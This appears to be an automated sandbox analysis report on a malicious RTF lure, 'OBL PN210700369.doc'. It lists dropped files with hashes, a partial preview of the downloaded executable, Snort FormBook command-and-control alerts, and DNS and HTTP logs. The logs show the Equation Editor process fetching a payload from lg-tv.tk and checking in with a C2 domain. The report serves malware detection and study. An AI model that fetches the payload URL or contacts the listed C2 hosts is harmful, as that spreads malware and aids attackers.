lg-tv.tk	RFQ9003930 New Order.doc	Get hash	malicious	Browse	185.239.243.112
	New Order.doc	Get hash	malicious	Browse	185.239.243.112
	24-09-2021 LETTER OF INTENT.doc	Get hash	malicious	Browse	185.239.243.112
	PON507991 Copy.doc	Get hash	malicious	Browse	185.239.243.112
	catalogue.doc	Get hash	malicious	Browse	185.239.243.112
	SWIFT.doc	Get hash	malicious	Browse	185.239.243.112
	AVB CMAU6526450 40HC COI2100105.doc	Get hash	malicious	Browse	185.239.243.112
	Paid Invoices.doc	Get hash	malicious	Browse	185.239.243.112
	Abn order 55.doc	Get hash	malicious	Browse	185.239.243.112
	RFQ.doc	Get hash	malicious	Browse	185.239.243.112
	DHL BL2021764774AWB.doc	Get hash	malicious	Browse	185.239.243.112
	sept quotation.doc	Get hash	malicious	Browse	185.239.243.112
	invoice-E-2-S-2122-1235.doc	Get hash	malicious	Browse	185.239.243.112
	Purchase Order PO81-36A2DC.doc	Get hash	malicious	Browse	185.239.243.112
	New ORDER.doc	Get hash	malicious	Browse	185.239.243.112
	Mahem Order.doc__.rtf	Get hash	malicious	Browse	185.239.243.112
	New Order.doc	Get hash	malicious	Browse	185.239.243.112
	BL and permit.doc	Get hash	malicious	Browse	185.239.243.112
	KOC-Order.doc	Get hash	malicious	Browse	185.239.243.112
	REQ_Scan001_No- 9300340731.doc	Get hash	malicious	Browse	185.239.243.112

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MAGICRETAILFR	Scan copy.docx	Get hash	malicious	Browse	185.42.117.109
	Scan copy.docx	Get hash	malicious	Browse	185.42.117.109
	https://ddghbbf.r.af.d.sendibt2.com/tr/cl/AZ_fzMJRsE3xIeU_QcnTrJNmrQopncatDd-eovbR7xYq9ypiIqtwKWyrTIIdxNfdZBUhEo89L97BvoqW-m0AK8lpY_G1A0R4-OqWFWF7yqRk6IwWGjYQTbxdkNXIPZafVx__3xwAI7RkCXl8CJrNWoLoVVIyiYf1YWtibYMuXAbvq5KxrlLw-G3RcpVIiID2f-TlZx3vckcUFNx1IBpr5JamUxI3ckvzVYmWJV1yS8ZgSAUq_5FOmOxjsnNrYCXLNFt9Ew	Get hash	malicious	Browse	185.42.117.109
CLOUDIE-AS-APCloudieLimitedHK	Proforma invoice.doc	Get hash	malicious	Browse	185.239.243.112
	J21021 TUBI PER QUALIFICHE.doc	Get hash	malicious	Browse	185.239.243.112
	RFQ9003930 New Order.doc	Get hash	malicious	Browse	185.239.243.112
	WELDED PIPES - Bid No 2000543592- PR.doc	Get hash	malicious	Browse	185.239.243.112
	AWB.doc	Get hash	malicious	Browse	185.239.243.112
	New Order.doc	Get hash	malicious	Browse	185.239.243.112
	DO526.doc	Get hash	malicious	Browse	185.239.243.112
	24-09-2021 LETTER OF INTENT.doc	Get hash	malicious	Browse	185.239.243.112
	IKpep4Zn5S.exe	Get hash	malicious	Browse	45.119.53.93
	DHL#AWB#29721.doc	Get hash	malicious	Browse	185.239.243.112
	PO2021.doc	Get hash	malicious	Browse	185.239.243.112
	PON507991 Copy.doc	Get hash	malicious	Browse	185.239.243.112
	OUTSTANDING PAYMENT.doc	Get hash	malicious	Browse	185.239.243.112
	New Order.doc	Get hash	malicious	Browse	185.239.243.112
	Proforma Invoice 28093.doc	Get hash	malicious	Browse	185.239.243.112
	BL UALBHHOU1.doc	Get hash	malicious	Browse	185.239.243.112
	Pedido 20839.doc	Get hash	malicious	Browse	185.239.243.112
	eJRGpI4A6d.exe	Get hash	malicious	Browse	45.119.53.93
	catalogue.doc	Get hash	malicious	Browse	185.239.243.112
	SWIFT.doc	Get hash	malicious	Browse	185.239.243.112

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obinnazx[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	854528
Entropy (8bit):	6.774419430382824
Encrypted:	false
SSDEEP:	12288:xrbm8YAmMS3odEXVd8TorUAey3ao5iJtKrPSA12GfSQJNca89gvZ1IVrEr6PlVsw:DVwIFwBoJK7u2xbGL4sgF+J6+v
MD5:	CEE3C4065C5CB9237B7EBE5C1B3ECEA5
SHA1:	CAD24EA1953A5194ED945CFEFCDB383300D27B14
SHA-256:	972F5E016FFC306524D7083A5A5058BA8B5FC60F3DB9F3C0915DB59C0523A487
SHA-512:	8D575FC8339A0488AA2FF94BC054EA0FFD15BACF0D56C41A6B085D100DBDA2C3C2884393FBD9DC9435815518E5518F110E0112AA3C23450E636F74406AE190D6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Reputation:	unknown
IE Cache URL:	http://lg-tv.tk/obinnazx.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0..p.............. ........@.. .......................`............@.....................................O.......<....................@....................................................... ............... ..H............text....o... ...p.................. ..`.rsrc...<............r..............@..@.reloc.......@......................@..B........................H............S........... ...o............................................{#...:.($.....}#.....0..$........u......,.(%....{#....{#...o&...+..v ..l. )UU.Z(%....{#...o'...X...0..M........r...p......%..{#....................-.q.............-.&.+.......o(....().....{.....{+...V.($.....}.....}+.....0..<........u......,0(%....{....{...o&...,.(,....{+....{+...o-...+... .pi\| )UU.Z(%....{...o'...X )UU.Z(,....{+...o....X....0...........r%..p......%..{...................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{889F468E-8515-4A9A-AC98-AE12DF1E51F6}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	8704
Entropy (8bit):	3.5090996280692335
Encrypted:	false
SSDEEP:	192:KWL6Lm5ZwpOTDEU/XhRPL23HJSx5wlT+ukhHSVuHBc8f:nWmXTr/jmT8SVmc8f
MD5:	8DABE577302E4DBCA7128F9647630969
SHA1:	CB8F73BFBFD2186384B5BEAB612175474E9987B2
SHA-256:	FD080241C4557C2C78CDEC082FFBDA1658D5E10D71D84391F74E1035EBDDC886
SHA-512:	AECB6793CF3E5B62F71C738C929E0C99CF2FB2298E3A320ED6F24E64923F32A6E95F2CB1F3B28A367991EFD80E2A23875BFA16780FA87757C38E7A8F0699E6BB
Malicious:	false
Reputation:	unknown
Preview:	~.?.!..?.).!.>.).$.2.#.4...8.^.!.:.?.8.`.3.)./.[.0.:.^.%...]./...6.).1.<.`.;.^.).7.>.=.!._.~...@...@.?.9.?.(.2.!.>.@.9./.`.&.`.%.<...:.?.>.7.[.8.~.?.@.<.?.:.%.5...6.&.?.7.[.%.?.8.2.\|.+.?.8.@.'.!.>.:...~.>.?.+.'.?.?.4.`.=.0...?.8.'.-.5.0.5.>.0./.,._.6....4._.-.2.-.>.1.'.\|.%.6.3.;...@.3.5.~.8.1.).'...[.?.~.[.&.>.`...'.(.2.`.>.[.8.6.6.&.;.7.`.(.0.+.%.6.$.0.`.`.?.9.\|.2.>.`.4.`.&./.%...4.'.>.%..$.%.1.^.6.`.>.`.+.1.[.?.=.%.^.9.>.!.'.`.?.9.9.:.#.7...7.=.].?.@.^.0...).,.[.<.0.7.4.@.4.>.'.0.-.9.%.+.!.7.!.?...@.<.).$...+.(.....~.?...?.>...>.=.0.%.>._.,.7...(.<.?.0.`.^._.1.#._.'.?.].@.4.'.0.....%.$.].?.^.[./.+.(.).`.#.%.,.(.?.8._.5..].?.4.=.^./.,.5.?.8.8.4.4.?.?.`.6.:.^.%.....^.?.1.~.?.=...8.9.9.-.(.^.5.;.#.'.#.@.0...7.~.,.>.\|.'..2.?.<..5.#.`...3.^.4.1.>.<.%.&.+.4.(.0.;.?.%.?.>.`.?.`.$.@.+.3.+.;.:.7.^.,.(.7.0.9.5...?._.>..=./.9..^.,.(.8.3./.?.`.;...;.&.9.6.1.>.9.,.?...2.?...].%.?.\|.7.5.9...<.(.?.5...>.?.\|.].$.?.^.?.$.(.4.;.).3...~...#.^.=.+.)...@.>.=.<.).*.?.2.+.1.@.?.`.?./.$.?.;.~.9.2.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A9A4A70D-764F-4C80-824C-4FCC7297AA70}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\OBL PN210700369.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Mon Sep 27 21:20:18 2021, length=15364, window=hide
Category:	dropped
Size (bytes):	2078
Entropy (8bit):	4.528794152113054
Encrypted:	false
SSDEEP:	24:8xn/XTuzLI+7GUJeQdWDv3qIE/7Es2xn/XTuzLI+7GUJeQdWDv3qIE/7Eg:8xn/XTktJ1HIWf2xn/XTktJ1HIWB
MD5:	F17F7D37F1F4EA2012970528A9893599
SHA1:	2384DD8C05FBB5732BE451B26E61030D375EA5F0
SHA-256:	D45792BE43D8DC19369B58EE2DF717634F5F29B0142D01CC6C03B29F53C981B4
SHA-512:	9CF07802ABBF7EB8D78C1BB272121EF5F1A42621D7762B5A641F4429B0D88179A5CAA1AA696A9B5829E093C9B15DB14F0108C005C217D8CA60B104A22499EF4C
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ...^I.>...^I.>....:......<...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S ....&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2..<..;S.. .OBLPN2~1.DOC..T.......S...S...........................O.B.L. .P.N.2.1.0.7.0.0.3.6.9...d.o.c.......}...............-...8...[............?J......C:\Users\..#...................\\936905\Users.user\Desktop\OBL PN210700369.doc.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.B.L. .P.N.2.1.0.7.0.0.3.6.9...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......936905..........D_....3N...W...9..g..........

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	83
Entropy (8bit):	4.33802836515046
Encrypted:	false
SSDEEP:	3:M1ohXMiF3oy9XMiF3omX1ohXMiF3ov:MQ8ej8ee8ey
MD5:	164D4619D3F17ACEED87B9E2EF54F083
SHA1:	A41DEC41B4EE1AD14CA45E7D79D54320C33DC8C7
SHA-256:	A9C1987EA544E95688651993061CACEDDBDC171C890F240DA1E09FC22EAF74AA
SHA-512:	3BE67CA2EE3D010C8C94A18FD7F82F8E3E4CFBC2253F8E2C3EECD911086803197DD4A33CE249B414F012F8D21787005E9BFC4D1BA2BEA841D0B106B1B1456939
Malicious:	false
Reputation:	unknown
Preview:	[doc]..OBL PN210700369.LNK=0..OBL PN210700369.LNK=0..[doc]..OBL PN210700369.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5:	45B1E2B14BE6C1EFC217DCE28709F72D
SHA1:	64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256:	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512:	2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious:	false
Reputation:	unknown
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	854528
Entropy (8bit):	6.774419430382824
Encrypted:	false
SSDEEP:	12288:xrbm8YAmMS3odEXVd8TorUAey3ao5iJtKrPSA12GfSQJNca89gvZ1IVrEr6PlVsw:DVwIFwBoJK7u2xbGL4sgF+J6+v
MD5:	CEE3C4065C5CB9237B7EBE5C1B3ECEA5
SHA1:	CAD24EA1953A5194ED945CFEFCDB383300D27B14
SHA-256:	972F5E016FFC306524D7083A5A5058BA8B5FC60F3DB9F3C0915DB59C0523A487
SHA-512:	8D575FC8339A0488AA2FF94BC054EA0FFD15BACF0D56C41A6B085D100DBDA2C3C2884393FBD9DC9435815518E5518F110E0112AA3C23450E636F74406AE190D6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0..p.............. ........@.. .......................`............@.....................................O.......<....................@....................................................... ............... ..H............text....o... ...p.................. ..`.rsrc...<............r..............@..@.reloc.......@......................@..B........................H............S........... ...o............................................{#...:.($.....}#.....0..$........u......,.(%....{#....{#...o&...+..v ..l. )UU.Z(%....{#...o'...X...0..M........r...p......%..{#....................-.q.............-.&.+.......o(....().....{.....{+...V.($.....}.....}+.....0..<........u......,0(%....{....{...o&...,.(,....{+....{+...o-...+... .pi\| )UU.Z(%....{...o'...X )UU.Z(,....{+...o....X....0...........r%..p......%..{...................

C:\Users\user\Desktop\~$L PN210700369.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5:	45B1E2B14BE6C1EFC217DCE28709F72D
SHA1:	64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256:	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512:	2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious:	false
Reputation:	unknown
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	4.268484581298422
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	OBL PN210700369.doc
File size:	15364
MD5:	ee6900ee7f29ffb8b1c5f5b9a8a117d0
SHA1:	74501f04465f268c3f2bfea3b371118fe25b6aed
SHA256:	135dedf906bbb8eef7aef3b5966f1b933e65725cef80e653031481feb7351d62
SHA512:	a03958a61cc9cfa8e8a35909b3c29f8d51d1c012bba5ccb2c7d0c2b80f0f77ae42ff25f51f2e4fa5c9ccacad17be5658ad64a8e2cd64d34d2b2aa444ac2ddbfb
SSDEEP:	384:zX0fvkYUwT9l9cjSb0zBfYJ6xrvXiGy694us:qywRl9Fb0LzSYGus
File Content Preview:	{\rtf2876~?!?)!>)$2#4.8^!:?8`3)/[0:^%.]/.6)1<`;^)7>=!_~.@.@?9?(2!>@9/`&`%<.:?>7[8~?@<?:%5.6&?7[%?82\|+?8@'!>:.~>?+'??4`=0?8'-505>0/,_6.4_-2->1'\|%63;.@35~81)'.[?~[&>`.'(2`>[866&;7`(0+%6$0``?9\|2>`4`&/%.4'>%*$%1^6`>`+1[?=%^9>!'`?99:#7.7=]?@^0.),[<074@4>'0

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00000F69h								no
1	00000F39h								no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/27/21-15:22:48.707829	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49166	80	192.168.2.22	2.57.140.50
09/27/21-15:22:48.707829	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49166	80	192.168.2.22	2.57.140.50
09/27/21-15:22:48.707829	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49166	80	192.168.2.22	2.57.140.50

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 15:20:59.931865931 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:20:59.956747055 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:20:59.956923962 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:20:59.957505941 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:20:59.982017040 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:20:59.983045101 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:20:59.983108044 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:20:59.983198881 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:20:59.983216047 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:20:59.983237982 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:20:59.983256102 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:20:59.983338118 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:20:59.983381987 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:20:59.983397961 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:20:59.983455896 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:20:59.983506918 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:20:59.983510017 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:20:59.983515978 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:20:59.983566046 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:20:59.983582020 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:20:59.983654976 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:20:59.983674049 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:20:59.983728886 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:20:59.983758926 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:20:59.983791113 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.007742882 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.007781029 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.007805109 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.007826090 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.007879019 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.007915974 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.007945061 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.007960081 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.007977962 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.008001089 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.008019924 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.008022070 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.008039951 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.008064985 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.008183002 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.008208990 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.008234024 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.008254051 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.008353949 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.008857012 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.008889914 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.008917093 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.008949995 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.009002924 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.009031057 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.009040117 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.009311914 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.009363890 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.009394884 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.009457111 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.009553909 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.009581089 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.009623051 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.009644985 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.009648085 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.009689093 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.011786938 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.033051014 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.033090115 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.033109903 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.033132076 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.033154011 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.033174038 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.033195019 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.033195972 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.033219099 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.033219099 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.033230066 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.033245087 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.033246040 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.033269882 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.033287048 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.033293009 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.033301115 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.033329010 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.033359051 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.033413887 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.033761024 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.033842087 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.033916950 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.034024954 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.034046888 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.034064054 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.034075022 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.034089088 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.034090996 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.034101963 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.034115076 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.034151077 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.034173965 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.034188032 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.034203053 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.034210920 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 27, 2021 15:21:00.034220934 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 27, 2021 15:21:00.034238100 CEST	80	49165	185.239.243.112	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 15:20:59.779753923 CEST	52167	53	192.168.2.22	8.8.8.8
Sep 27, 2021 15:20:59.838419914 CEST	53	52167	8.8.8.8	192.168.2.22
Sep 27, 2021 15:20:59.839001894 CEST	52167	53	192.168.2.22	8.8.8.8
Sep 27, 2021 15:20:59.911375046 CEST	53	52167	8.8.8.8	192.168.2.22
Sep 27, 2021 15:22:48.597263098 CEST	50591	53	192.168.2.22	8.8.8.8
Sep 27, 2021 15:22:48.663492918 CEST	53	50591	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 27, 2021 15:20:59.779753923 CEST	192.168.2.22	8.8.8.8	0xae31	Standard query (0)	lg-tv.tk	A (IP address)	IN (0x0001)
Sep 27, 2021 15:20:59.839001894 CEST	192.168.2.22	8.8.8.8	0xae31	Standard query (0)	lg-tv.tk	A (IP address)	IN (0x0001)
Sep 27, 2021 15:22:48.597263098 CEST	192.168.2.22	8.8.8.8	0xfc43	Standard query (0)	www.islamic-coins.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Sep 27, 2021 15:20:59.838419914 CEST	8.8.8.8	192.168.2.22	0xae31	No error (0)	lg-tv.tk	185.239.243.112	A (IP address)	IN (0x0001)
Sep 27, 2021 15:20:59.911375046 CEST	8.8.8.8	192.168.2.22	0xae31	No error (0)	lg-tv.tk	185.239.243.112	A (IP address)	IN (0x0001)
Sep 27, 2021 15:22:48.663492918 CEST	8.8.8.8	192.168.2.22	0xfc43	No error (0)	www.islamic-coins.com	2.57.140.50	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

lg-tv.tk

www.islamic-coins.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	185.239.243.112	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Sep 27, 2021 15:20:59.957505941 CEST	0	OUT	GET /obinnazx.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: lg-tv.tk Connection: Keep-Alive
